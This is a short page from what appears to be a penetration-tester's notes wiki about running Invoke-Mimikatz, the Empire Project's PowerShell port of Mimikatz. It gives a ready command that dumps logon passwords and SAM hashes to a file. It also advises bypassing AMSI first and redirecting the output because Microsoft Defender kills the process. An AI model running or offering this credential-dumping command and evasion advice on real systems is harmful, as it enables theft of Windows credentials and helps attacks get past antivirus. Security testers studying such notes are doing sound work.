Invoke-Mimikatz - Cardboard Iguana Security

# Invoke-Mimikatz [[Mimikatz]] binaries are generally detected by AV on download these days, but fortunately there's a PowerShell [re-implementation available from the Empire Project](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Mimikatz.ps1) that can be run after bypassing AMSI. ```powershell Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' > C:\mkat.txt ``` Note that Microsoft Defender will still detect the execution of Invoke-Mimikatz and kill the hosting PowerShell process. This is why we need to redirect the output to a file. %% ## Dumping tickets ![[Use Invoke-Mimikatz to dump Kerberos tickets]] ## Pass the hash ![[Pass the hash with Invoke-Mimikatz]] %%